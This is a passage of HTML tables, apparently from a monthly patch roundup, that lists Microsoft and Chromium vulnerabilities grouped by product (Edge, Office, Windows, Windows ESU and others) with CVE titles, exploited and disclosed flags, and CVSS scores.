target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-25001">CVE-2025-25001</a></td><td>Microsoft Edge for iOS Spoofing Vulnerability</td><td>No</td><td>No</td><td>4.3</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-3074">CVE-2025-3074</a></td><td>Chromium: CVE-2025-3074 Inappropriate implementation in Downloads</td><td>No</td><td>No</td><td>N/A</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-3073">CVE-2025-3073</a></td><td>Chromium: CVE-2025-3073 Inappropriate implementation in Autofill</td><td>No</td><td>No</td><td>N/A</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-3072">CVE-2025-3072</a></td><td>Chromium: CVE-2025-3072 Inappropriate implementation in Custom Tabs</td><td>No</td><td>No</td><td>N/A</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-3071">CVE-2025-3071</a></td><td>Chromium: CVE-2025-3071 Inappropriate implementation in Navigations</td><td>No</td><td>No</td><td>N/A</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-3070">CVE-2025-3070</a></td><td>Chromium: CVE-2025-3070 Insufficient validation of untrusted input in Extensions</td><td>No</td><td>No</td><td>N/A</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-3069">CVE-2025-3069</a></td><td>Chromium: CVE-2025-3069 Inappropriate implementation in Extensions</td><td>No</td><td>No</td><td>N/A</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-3068">CVE-2025-3068</a></td><td>Chromium: CVE-2025-3068 Inappropriate implementation in Intents</td><td>No</td><td>No</td><td>N/A</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-3067">CVE-2025-3067</a></td><td>Chromium: CVE-2025-3067 Inappropriate implementation in Custom Tabs</td><td>No</td><td>No</td><td>N/A</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-3066">CVE-2025-3066</a></td><td>Chromium: CVE-2025-3066 Use after free in Navigations</td><td>No</td><td>No</td><td>N/A</td></tr></tbody></table><h3>Developer Tools vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26682">CVE-2025-26682</a></td><td>ASP.NET Core and Visual Studio Denial of Service Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29802">CVE-2025-29802</a></td><td>Visual Studio Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.3</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29804">CVE-2025-29804</a></td><td>Visual Studio Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.3</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-20570">CVE-2025-20570</a></td><td>Visual Studio Code Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>6.8</td></tr></tbody></table><h3>Developer Tools SQL Server vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29803">CVE-2025-29803</a></td><td>Visual Studio Tools for Applications and SQL Server Management Studio Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.3</td></tr></tbody></table><h3>Microsoft Dynamics vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29821">CVE-2025-29821</a></td><td>Microsoft Dynamics Business Central Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>5.5</td></tr></tbody></table><h3>Microsoft Office vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29794">CVE-2025-29794</a></td><td>Microsoft SharePoint Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27747">CVE-2025-27747</a></td><td>Microsoft Word Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29820">CVE-2025-29820</a></td><td>Microsoft Word Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29822">CVE-2025-29822</a></td><td>Microsoft OneNote Security Feature Bypass Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27745">CVE-2025-27745</a></td><td>Microsoft Office Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27748">CVE-2025-27748</a></td><td>Microsoft Office Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27749">CVE-2025-27749</a></td><td>Microsoft Office Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27746">CVE-2025-27746</a></td><td>Microsoft Office Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26642">CVE-2025-26642</a></td><td>Microsoft Office Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27744">CVE-2025-27744</a></td><td>Microsoft Office Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27752">CVE-2025-27752</a></td><td>Microsoft Excel Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29791">CVE-2025-29791</a></td><td>Microsoft Excel Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27751">CVE-2025-27751</a></td><td>Microsoft Excel Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27750">CVE-2025-27750</a></td><td>Microsoft Excel Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29823">CVE-2025-29823</a></td><td>Microsoft Excel Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29800">CVE-2025-29800</a></td><td>Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29801">CVE-2025-29801</a></td><td>Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29816">CVE-2025-29816</a></td><td>Microsoft Word Security Feature Bypass Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29792">CVE-2025-29792</a></td><td>Microsoft Office Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.3</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29793">CVE-2025-29793</a></td><td>Microsoft SharePoint Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.2</td></tr></tbody></table><h3>System Center vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27743">CVE-2025-27743</a></td><td>Microsoft System Center Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr></tbody></table><h3>Windows vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26678">CVE-2025-26678</a></td><td>Windows Defender Application Control Security Feature Bypass Vulnerability</td><td>No</td><td>No</td><td>8.4</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27482">CVE-2025-27482</a></td><td>Windows Remote Desktop Services Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.1</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26639">CVE-2025-26639</a></td><td>Windows USB Print Driver Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26675">CVE-2025-26675</a></td><td>Windows Subsystem for Linux Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27729">CVE-2025-27729</a></td><td>Windows Shell Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29811">CVE-2025-29811</a></td><td>Windows Mobile Broadband Driver Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26666">CVE-2025-26666</a></td><td>Windows Media Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26674">CVE-2025-26674</a></td><td>Windows Media Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27728">CVE-2025-27728</a></td><td>Windows Kernel-Mode Driver Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27739">CVE-2025-27739</a></td><td>Windows Kernel Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27476">CVE-2025-27476</a></td><td>Windows Digital Media Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27467">CVE-2025-27467</a></td><td>Windows Digital Media Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27730">CVE-2025-27730</a></td><td>Windows Digital Media Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-24058">CVE-2025-24058</a></td><td>Windows DWM Core Library Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27490">CVE-2025-27490</a></td><td>Windows Bluetooth Service Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27731">CVE-2025-27731</a></td><td>Microsoft OpenSSH for Windows Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-24074">CVE-2025-24074</a></td><td>Microsoft DWM Core Library Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-24073">CVE-2025-24073</a></td><td>Microsoft DWM Core Library Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-24060">CVE-2025-24060</a></td><td>Microsoft DWM Core Library Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-24062">CVE-2025-24062</a></td><td>Microsoft DWM Core Library Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29812">CVE-2025-29812</a></td><td>DirectX Graphics Kernel Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29809">CVE-2025-29809</a></td><td>Windows Kerberos Security Feature Bypass Vulnerability</td><td>No</td><td>No</td><td>7.1</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27491">CVE-2025-27491</a></td><td>Windows Hyper-V Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.1</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27475">CVE-2025-27475</a></td><td>Windows Update Stack Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26649">CVE-2025-26649</a></td><td>Windows Secure Channel Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27492">CVE-2025-27492</a></td><td>Windows Secure Channel Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26640">CVE-2025-26640</a></td><td>Windows Digital Media Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26681">CVE-2025-26681</a></td><td>Win32k Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>6.7</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26651">CVE-2025-26651</a></td><td>Windows Local Session Manager (LSM) Denial of Service Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26635">CVE-2025-26635</a></td><td>Windows Hello Security Feature Bypass Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27735">CVE-2025-27735</a></td><td>Windows Virtualization-Based Security (VBS) Security Feature Bypass Vulnerability</td><td>No</td><td>No</td><td>6</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27736">CVE-2025-27736</a></td><td>Windows Power Dependency Coordinator Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>5.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29808">CVE-2025-29808</a></td><td>Windows Cryptographic Services Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>5.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26644">CVE-2025-26644</a></td><td>Windows Hello Spoofing Vulnerability</td><td>No</td><td>No</td><td>5.1</td></tr></tbody></table><h3>Windows Azure vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29819">CVE-2025-29819</a></td><td>Windows Admin Center in Azure Portal Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.2</td></tr></tbody></table><h3>Windows ESU vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27477">CVE-2025-27477</a></td><td>Windows Telephony Service Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-21205">CVE-2025-21205</a></td><td>Windows Telephony Service Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-21221">CVE-2025-21221</a></td><td>Windows Telephony Service Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-21222">CVE-2025-21222</a></td><td>Windows Telephony Service Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27481">CVE-2025-27481</a></td><td>Windows Telephony Service Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26669">CVE-2025-26669</a></td><td>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>8.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27740">CVE-2025-27740</a></td><td>Active Directory Certificate Services Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>8.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27737">CVE-2025-27737</a></td><td>Windows Security Zone Mapping Security Feature Bypass Vulnerability</td><td>No</td><td>No</td><td>8.6</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27480">CVE-2025-27480</a></td><td>Windows Remote Desktop Services Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.1</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26671">CVE-2025-26671</a></td><td>Windows Remote Desktop Services Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.1</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26663">CVE-2025-26663</a></td><td>Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.1</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26647">CVE-2025-26647</a></td><td>Windows Kerberos Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>8.1</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26670">CVE-2025-26670</a></td><td>Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.1</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27487">CVE-2025-27487</a></td><td>Remote Desktop Client Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-21204">CVE-2025-21204</a></td><td>Windows Process Activation Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26648">CVE-2025-26648</a></td><td>Windows Kernel Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27727">CVE-2025-27727</a></td><td>Windows Installer Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29824">CVE-2025-29824</a></td><td>Windows Common Log File System Driver Elevation of Privilege Vulnerability</td><td>Yes</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26679">CVE-2025-26679</a></td><td>RPC Endpoint Mapper Service Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27741">CVE-2025-27741</a></td><td>NTFS Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27483">CVE-2025-27483</a></td><td>NTFS Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27733">CVE-2025-27733</a></td><td>NTFS Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26688">CVE-2025-26688</a></td><td>Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27484">CVE-2025-27484</a></td><td>Windows Universal Plug and Play (UPnP) Device Host Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26686">CVE-2025-26686</a></td><td>Windows TCP/IP Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26680">CVE-2025-26680</a></td><td>Windows Standards-Based Storage Management Service Denial of Service Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27470">CVE-2025-27470</a></td><td>Windows Standards-Based Storage Management Service Denial of Service Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-21174">CVE-2025-21174</a></td><td>Windows Standards-Based Storage Management Service Denial of Service Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26652">CVE-2025-26652</a></td><td>Windows Standards-Based Storage Management Service Denial of Service Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27485">CVE-2025-27485</a></td><td>Windows Standards-Based Storage Management Service Denial of Service Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27486">CVE-2025-27486</a></td><td>Windows Standards-Based Storage Management Service Denial of Service Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26668">CVE-2025-26668</a></td><td>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26673">CVE-2025-26673</a></td><td>Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27469">CVE-2025-27469</a></td><td>Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26641">CVE-2025-26641</a></td><td>Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27479">CVE-2025-27479</a></td><td>Kerberos Key Distribution Proxy Service Denial of Service Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27473">CVE-2025-27473</a></td><td>HTTP.sys Denial of Service Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29810">CVE-2025-29810</a></td><td>Active Directory Domain Services Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26665">CVE-2025-26665</a></td><td>Windows upnphost.dll Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27478">CVE-2025-27478</a></td><td>Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-21191">CVE-2025-21191</a></td><td>Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27732">CVE-2025-27732</a></td><td>Windows Graphics Component Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26637">CVE-2025-26637</a></td><td>BitLocker Security Feature Bypass Vulnerability</td><td>No</td><td>No</td><td>6.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26664">CVE-2025-26664</a></td><td>Windows Routing and Remote Access Service (RRAS) Information Disclosure 